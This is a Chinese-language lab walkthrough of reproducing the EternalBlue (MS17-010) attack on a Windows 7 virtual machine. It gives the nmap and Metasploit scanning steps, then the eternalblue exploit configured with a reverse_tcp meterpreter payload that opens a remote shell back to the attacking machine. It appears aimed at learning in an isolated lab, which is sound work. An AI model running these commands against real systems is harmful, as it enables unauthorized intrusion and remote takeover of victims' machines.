在某一次会议上发现我并不会永恒之蓝,所以,嗯,我来了。
复现环境
kali:192.168.233.145
win7:192.168.233.146
信息搜集
nmap扫端口
nmap -Pn 192.168.233.146
看到开放了445端口,而永恒之蓝(ms17-010)利用的就是445端口的smb服务。
syn扫描模块
除了nmap还可以直接用msf自带的syn扫描模块
set rhosts 192.168.233.146 设置远端主机
set ports 0-500 设置端口范围
set threads 20 设置线程
run 执行
我这里报错了,但命令是没问题的
image.png
后来查了一下用sudo 起msfconsole就好了 这次的端口范围是0-1000(真的很慢就是了,20线程还慢成这样子,还是nmap好用)
image.png
进入msf框架
msfconsole
search ms 17-010
搜出不少东西,大体分为两部分,auxiliary(辅助)模块和exploit(攻击)模块。auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞。
exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。
扫描是否存在ms 17-010
use auxiliary/scanner/smb/smb_ms17_010
然后看看必要的options
show options
右边yes的就是必要选项
RHOSTS 参数是要探测主机的ip或ip范围
set RHOSTS 192.168.233.146
RPORT参数是该主机的端口
set RPORT 445
执行
run
image.png
看到探测说很可能能够会受到永恒之蓝漏洞的攻击。
攻击
首先攻击模块
use exploit/windows/smb/ms17_010_eternalblue
info命令查看这个漏洞的信息
show payloads
该命令可以查看当前漏洞利用模块下可用的所有Payload
image.png
设置攻击负载
set payload windows/x64/meterpreter/reverse_tcp
设置好rhosts(远端ip) 和lhost(本地ip)
image.png
命令详情:
—set payload windows/x64/meterpreter/reverse_tcp
(要选用其他payload可以使用show payloads查看适合要攻击的目标主机的payload)
—show options :使用该命令会列出使用当前模块所需配置的参数
—set RHOST 目标主机地址 :该命令会设置好要攻击的目标主机地址
—set LHOST 攻击机地址 :该命令设置攻击机的地址,使目标主机回连至攻击机
—set LPORT 回连的端口 :该命令设置目标主机回连至攻击机的端口,默认为4444
—run:开始攻击
攻击成功后攻击机和目标主机之间会建立一个连接,得到一个meterpreter会话
image.png
第一个框说明可以利用
第二个框说明已经覆盖完成
image.png
这里看到靶机和攻击机建立了一个shell连接,会话为session 1
我们回到windows机器发现已经打黑屏了 image.png
网友评论